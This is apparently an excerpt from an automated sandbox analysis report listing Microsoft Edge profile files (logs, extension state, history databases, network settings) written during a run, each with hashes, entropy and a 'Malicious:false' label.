                                                                                                                                                                                                                  SHA1:4039A5DD607F9FB14018185F707944FE7BA25EF7
                                                                                                                                                                                                                  SHA-256:1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
                                                                                                                                                                                                                  SHA-512:31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\LOG

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):332
                                                                                                                                                                                                                  Entropy (8bit):5.184448623321851
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:6:7PQXdFN+q2PN723oH+Tcwt865IFUt8OPQjFoZmw+OPQRVkwON723oH+Tcwt86+Ud:7oXovVaYeb/WFUt8Oo5o/+Oo/5OaYebD
                                                                                                                                                                                                                  MD5:ACEAADF534F3BA4F959F790296214098
                                                                                                                                                                                                                  SHA1:749A4AB2CB1F1A96D660ECC82A4CB5D3B3E6D7B0
                                                                                                                                                                                                                  SHA-256:2E224A7F6A898792CE7FD46CA1E359C60E92750B3AE2862F78C80FEB9A195607
                                                                                                                                                                                                                  SHA-512:D8F8021D01EC5E3553B394E1621361D98FC4DDED81C86A93336E06C62E20E13964B6D3CB261C676C88409599A19409721FE8B8CA9D210A1E78E3318552B836DE
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:2024/12/18-15:06:08.531 1e78 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2024/12/18-15:06:08.534 1e78 Recovering log #3.2024/12/18-15:06:08.535 1e78 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\LOG.old (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):332
                                                                                                                                                                                                                  Entropy (8bit):5.184448623321851
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:6:7PQXdFN+q2PN723oH+Tcwt865IFUt8OPQjFoZmw+OPQRVkwON723oH+Tcwt86+Ud:7oXovVaYeb/WFUt8Oo5o/+Oo/5OaYebD
                                                                                                                                                                                                                  MD5:ACEAADF534F3BA4F959F790296214098
                                                                                                                                                                                                                  SHA1:749A4AB2CB1F1A96D660ECC82A4CB5D3B3E6D7B0
                                                                                                                                                                                                                  SHA-256:2E224A7F6A898792CE7FD46CA1E359C60E92750B3AE2862F78C80FEB9A195607
                                                                                                                                                                                                                  SHA-512:D8F8021D01EC5E3553B394E1621361D98FC4DDED81C86A93336E06C62E20E13964B6D3CB261C676C88409599A19409721FE8B8CA9D210A1E78E3318552B836DE
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:2024/12/18-15:06:08.531 1e78 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2024/12/18-15:06:08.534 1e78 Recovering log #3.2024/12/18-15:06:08.535 1e78 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\000003.log

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1254
                                                                                                                                                                                                                  Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:12:qWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWA:
                                                                                                                                                                                                                  MD5:826B4C0003ABB7604485322423C5212A
                                                                                                                                                                                                                  SHA1:6B8EF07391CD0301C58BB06E8DEDCA502D59BCB4
                                                                                                                                                                                                                  SHA-256:C56783C3A6F28D9F7043D2FB31B8A956369F25E6CE6441EB7C03480334341A63
                                                                                                                                                                                                                  SHA-512:0474165157921EA84062102743EE5A6AFE500F1F87DE2E87DBFE36C32CFE2636A0AE43D8946342740A843D5C2502EA4932623C609B930FE8511FE7356D4BAA9C
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5........

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):328
                                                                                                                                                                                                                  Entropy (8bit):5.158758175301928
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:6:7PQ4q2PN723oH+Tcwt8NIFUt8OPQJZmw+OPQDkwON723oH+Tcwt8+eLJ:7o4vVaYebpFUt8OoJ/+OoD5OaYebqJ
                                                                                                                                                                                                                  MD5:6490A37A7BE883F33270C51A6297398C
                                                                                                                                                                                                                  SHA1:2859A9AAD46A0E760ED9722C37C45A80E97AAF49
                                                                                                                                                                                                                  SHA-256:70604A4B37C20DB64CECC0CB21A499F13A2D158659FA7BE5F90813102C67CA80
                                                                                                                                                                                                                  SHA-512:D669793B20A6AC562B4C501187B64ECE5966DA7968FAE75074C30A33D4BC6CB39F5A84E7B1B3F1684DAB02CA3BAEB522D0B21ADEEE0E564864AD152DB503EBBC
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:2024/12/18-15:06:09.569 1e14 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/12/18-15:06:09.569 1e14 Recovering log #3.2024/12/18-15:06:09.569 1e14 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG.old (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):328
                                                                                                                                                                                                                  Entropy (8bit):5.158758175301928
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:6:7PQ4q2PN723oH+Tcwt8NIFUt8OPQJZmw+OPQDkwON723oH+Tcwt8+eLJ:7o4vVaYebpFUt8OoJ/+OoD5OaYebqJ
                                                                                                                                                                                                                  MD5:6490A37A7BE883F33270C51A6297398C
                                                                                                                                                                                                                  SHA1:2859A9AAD46A0E760ED9722C37C45A80E97AAF49
                                                                                                                                                                                                                  SHA-256:70604A4B37C20DB64CECC0CB21A499F13A2D158659FA7BE5F90813102C67CA80
                                                                                                                                                                                                                  SHA-512:D669793B20A6AC562B4C501187B64ECE5966DA7968FAE75074C30A33D4BC6CB39F5A84E7B1B3F1684DAB02CA3BAEB522D0B21ADEEE0E564864AD152DB503EBBC
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:2024/12/18-15:06:09.569 1e14 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/12/18-15:06:09.569 1e14 Recovering log #3.2024/12/18-15:06:09.569 1e14 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\jmjflgjpcpepeafmmgdpfkogkghcpiha\1.2.1_0\_metadata\computed_hashes.json

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):429
                                                                                                                                                                                                                  Entropy (8bit):5.809210454117189
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:6:Y8U0vEjrAWT0VAUD9lpMXO4SrqiweVHUSENjrAWT0HQQ9/LZyVMQ3xqiweVHlrSQ:Y8U5j0pqCjJA7tNj0pHx/LZ4hcdQ
                                                                                                                                                                                                                  MD5:5D1D9020CCEFD76CA661902E0C229087
                                                                                                                                                                                                                  SHA1:DCF2AA4A1C626EC7FFD9ABD284D29B269D78FCB6
                                                                                                                                                                                                                  SHA-256:B829B0DF7E3F2391BFBA70090EB4CE2BA6A978CCD665EEBF1073849BDD4B8FB9
                                                                                                                                                                                                                  SHA-512:5F6E72720E64A7AC19F191F0179992745D5136D41DCDC13C5C3C2E35A71EB227570BD47C7B376658EF670B75929ABEEBD8EF470D1E24B595A11D320EC1479E3C
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{"file_hashes":[{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","6RbL+qKART8FehO4s7U0u67iEI8/jaN+8Kg3kII+uy4=","CuN6+RcZAysZCfrzCZ8KdWDkQqyaIstSrcmsZ/c2MVs="],"block_size":4096,"path":"content.js"},{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","UL53sQ5hOhAmII/Yx6muXikzahxM+k5gEmVOh7xJ3Rw=","u6MdmVNzBUfDzMwv2LEJ6pXR8k0nnvpYRwOL8aApwP8="],"block_size":4096,"path":"content_new.js"}],"version":2}

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 2, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):155648
                                                                                                                                                                                                                  Entropy (8bit):0.5672091307983632
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:+7nJLWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE8ye:+LchH+bDo3iN0Z2TVJkXBBE3ybN
                                                                                                                                                                                                                  MD5:8FE6CA19340DFCC0E1E4808530BC3E49
                                                                                                                                                                                                                  SHA1:648A86121A8D7FE387D00A75CE24F2ED877B3E55
                                                                                                                                                                                                                  SHA-256:5CA75A02E9D45E5ACA71152BBA1B1DD755A89B538E84AD77E0BA9EFC6BE25D46
                                                                                                                                                                                                                  SHA-512:83BCBFDE77691F985FB73775209DE3953F792B807AA50C053A4A9C19E6E393D707AB2DDFE968DCF0E4EBA4E9C66EB7EF69321DEA8ECF92F3BCA21D081592B2BA
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):8720
                                                                                                                                                                                                                  Entropy (8bit):0.21880421027789762
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:IRR9tFlljq7A/mhWJFuQ3yy7IOWUhtdweytllrE9SFcTp4AGbNCV9RUIV:IG75fOjtd0Xi99pEY7
                                                                                                                                                                                                                  MD5:BD9ED092B9E721FD01C8511ECDC04F06
                                                                                                                                                                                                                  SHA1:22C1D59753161FE1858B9865C807C3AFDCD90F25
                                                                                                                                                                                                                  SHA-256:2A1AF535632BE9EA13446E70232BC5B4217E856DC4259305F19D1137F42904D6
                                                                                                                                                                                                                  SHA-512:4053BBB9D2522670D288141BD2DD3D31BB6D9FD720B49D041347429BE5A5DF3F6F86C478ABAC70B931A3DC0E0BD81C3251C2703E1A35FAC51C547270BB3FB593
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:............. .....&....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HubApps (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):115717
                                                                                                                                                                                                                  Entropy (8bit):5.183660917461099
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                                                                                  MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                                                                                  SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                                                                                                  SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                                                                                  SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HubApps Icons

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 12, cookie 0x3, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):49152
                                                                                                                                                                                                                  Entropy (8bit):3.647397366286664
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:aj9P0qjlbP/Kbtpgam6I8QkQerNcQhj773pLLRKToaAu:adhlbP/jse2CQF7NRKcC
                                                                                                                                                                                                                  MD5:3BE7D22EF9BF6430773AF449D27CDB3F
                                                                                                                                                                                                                  SHA1:AD7EBC0041F0ED0DA62987DC1B6A6A6097F131F6
                                                                                                                                                                                                                  SHA-256:3A64650CBBD2CBF16FE67A738A002894CBB736EA8CE67F7593E0E9A8F072DF47
                                                                                                                                                                                                                  SHA-512:13EC01D2A4CE515382B0FD2095A937182419220C44C64FE99EA628848C3CDC117CBB689FE4AEE9746CD21F1145F6F4746F1D9E2B072FFE41E515AE05825F7273
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...:.8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\LOG

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):412
                                                                                                                                                                                                                  Entropy (8bit):5.234920520334817
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:12:7ooqROvVaYeb8rcHEZrELFUt8Oo4/+Oog5OaYeb8rcHEZrEZSJ:7ooqRMVaYeb8nZrExg8OoYoKOaYeb8nP
                                                                                                                                                                                                                  MD5:1BB1628411A9DAE6F012CE2A7BA6139E
                                                                                                                                                                                                                  SHA1:EA11EF263ADF65DA54F129E2B7E337512C501794
                                                                                                                                                                                                                  SHA-256:6AC534B9D88AD021E25EB18AEE902C2766ADD4853E7ED397F8726D3B22032C36
                                                                                                                                                                                                                  SHA-512:ECA31D71A842F0B3D9188836B89EE7CD2760EB38A1DD420557AF5DEE73EEBAF0D25B97B24D990AEB323950A4A69817D89CB5FCB36293DD3FAEB074B37D6F2D18
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:2024/12/18-15:06:14.031 1e14 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2024/12/18-15:06:14.032 1e14 Recovering log #3.2024/12/18-15:06:14.032 1e14 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\LOG.old (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):412
                                                                                                                                                                                                                  Entropy (8bit):5.234920520334817
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:12:7ooqROvVaYeb8rcHEZrELFUt8Oo4/+Oog5OaYeb8rcHEZrEZSJ:7ooqRMVaYeb8nZrExg8OoYoKOaYeb8nP
                                                                                                                                                                                                                  MD5:1BB1628411A9DAE6F012CE2A7BA6139E
                                                                                                                                                                                                                  SHA1:EA11EF263ADF65DA54F129E2B7E337512C501794
                                                                                                                                                                                                                  SHA-256:6AC534B9D88AD021E25EB18AEE902C2766ADD4853E7ED397F8726D3B22032C36
                                                                                                                                                                                                                  SHA-512:ECA31D71A842F0B3D9188836B89EE7CD2760EB38A1DD420557AF5DEE73EEBAF0D25B97B24D990AEB323950A4A69817D89CB5FCB36293DD3FAEB074B37D6F2D18
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:2024/12/18-15:06:14.031 1e14 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2024/12/18-15:06:14.032 1e14 Recovering log #3.2024/12/18-15:06:14.032 1e14 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):340
                                                                                                                                                                                                                  Entropy (8bit):5.154704494248405
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:6:7PQE4pQL+q2PN723oH+Tcwt8a2jMGIFUt8OPQCGGKWZmw+OPQ4QLVkwON723oH+k:7oEGQ+vVaYeb8EFUt8OoTGKW/+Oo4QVu
                                                                                                                                                                                                                  MD5:0D9D49EE16111BDCF7171CF9AFAFCA6E
                                                                                                                                                                                                                  SHA1:CAB2333E79B4492D372943E0A8929BC5D4E7F3D4
                                                                                                                                                                                                                  SHA-256:E52BE980FE526DEF9BE89632A7B60B4BFEF3D08E33D494D0B4A0F0385C6C32A6
                                                                                                                                                                                                                  SHA-512:5A02B00BA289DD672B99D57D0745DFAA603C54B89B192F02B47FC3083FB776A3024F2C66AD846248D32B4350AB5DA6DCFA7B2D11003591207E00587A19DBCC09
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:2024/12/18-15:06:08.692 1eec Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/12/18-15:06:08.694 1eec Recovering log #3.2024/12/18-15:06:08.697 1eec Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG.old (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):340
                                                                                                                                                                                                                  Entropy (8bit):5.154704494248405
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:6:7PQE4pQL+q2PN723oH+Tcwt8a2jMGIFUt8OPQCGGKWZmw+OPQ4QLVkwON723oH+k:7oEGQ+vVaYeb8EFUt8OoTGKW/+Oo4QVu
                                                                                                                                                                                                                  MD5:0D9D49EE16111BDCF7171CF9AFAFCA6E
                                                                                                                                                                                                                  SHA1:CAB2333E79B4492D372943E0A8929BC5D4E7F3D4
                                                                                                                                                                                                                  SHA-256:E52BE980FE526DEF9BE89632A7B60B4BFEF3D08E33D494D0B4A0F0385C6C32A6
                                                                                                                                                                                                                  SHA-512:5A02B00BA289DD672B99D57D0745DFAA603C54B89B192F02B47FC3083FB776A3024F2C66AD846248D32B4350AB5DA6DCFA7B2D11003591207E00587A19DBCC09
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:2024/12/18-15:06:08.692 1eec Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/12/18-15:06:08.694 1eec Recovering log #3.2024/12/18-15:06:08.697 1eec Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\019e40df-d678-4807-af6d-bd6fccbc228a.tmp

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1452
                                                                                                                                                                                                                  Entropy (8bit):5.287526653429432
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:YcCp/WRdstyZVMdmRdsHKyZFRudFGRwC5mWRdspZFGJ/I3w6C1E6maPsQYhbA7n+:YcCpWsktsHnfc7CvsfgCgakhYhbj
                                                                                                                                                                                                                  MD5:C11A0C2888E9122AF3E0A9532E7CF485
                                                                                                                                                                                                                  SHA1:213F8630A4D6B265DB899E1B4FED27EC8F2F1C75
                                                                                                                                                                                                                  SHA-256:F08277C5DFC76862C95DA3763626FC4A099530B656C9ED5C42DE6E3079D64B57
                                                                                                                                                                                                                  SHA-512:BB02933E6DF73CF073C94460869B99200E08C1B293D476B6F7C76F012B0BF9126A60031A31555CB755DF9C464B16272FEB6B1E0C0528FFAF5BB934F5E87A279E
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{"net":{"http_server_properties":{"servers":[{"anonymization":["FAAAAA4AAABodHRwOi8vbXNuLmNvbQAA",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343552282221456","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343552282945526","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"anonymization":["FAAAAA8AAABodHRwczovL21zbi5jb20A",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343552291816684","port":443,"protocol_str":"quic"}],"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server"

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\078cbb06-9041-42f1-a283-8417e7784ea4.tmp

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1597
                                                                                                                                                                                                                  Entropy (8bit):5.320181140794784
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:YcCpfC0gCzsCRtswfcKs5fleeIkBKYhbj:F2fh7R/mfkeIkBvh/
                                                                                                                                                                                                                  MD5:E975A6B9EC0B3C30AF3FA39ACEC4CD2A
                                                                                                                                                                                                                  SHA1:989C4D1F41B7C2648C2F8EDDFA387B5499BCCD5F
                                                                                                                                                                                                                  SHA-256:3D2FB10C0FDCCD89B1EACC382E2404CC3D8639A20BA9E515341A12AF53A6489F
                                                                                                                                                                                                                  SHA-512:4C13A0D7798F269EF2DE20D14094A0A025B27784B2B40E5032C4AA18A99E23CA7434F154E78929E1D36AE452BA3BBB286EFDECA1ACB3939A7E3423FC825A6351
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{"net":{"http_server_properties":{"servers":[{"anonymization":["FAAAAA4AAABodHRwOi8vbXNuLmNvbQAA",false],"server":"https://assets.msn.com","supports_spdy":true},{"anonymization":["FAAAAA8AAABodHRwczovL21zbi5jb20A",false],"server":"https://assets.msn.com","supports_spdy":true},{"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server":"https://www.googleapis.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13381617973089606","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13381617980043709","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"1

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\498e0eb9-b051-4ada-995d-ab29966d2fac.tmp

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:H:H
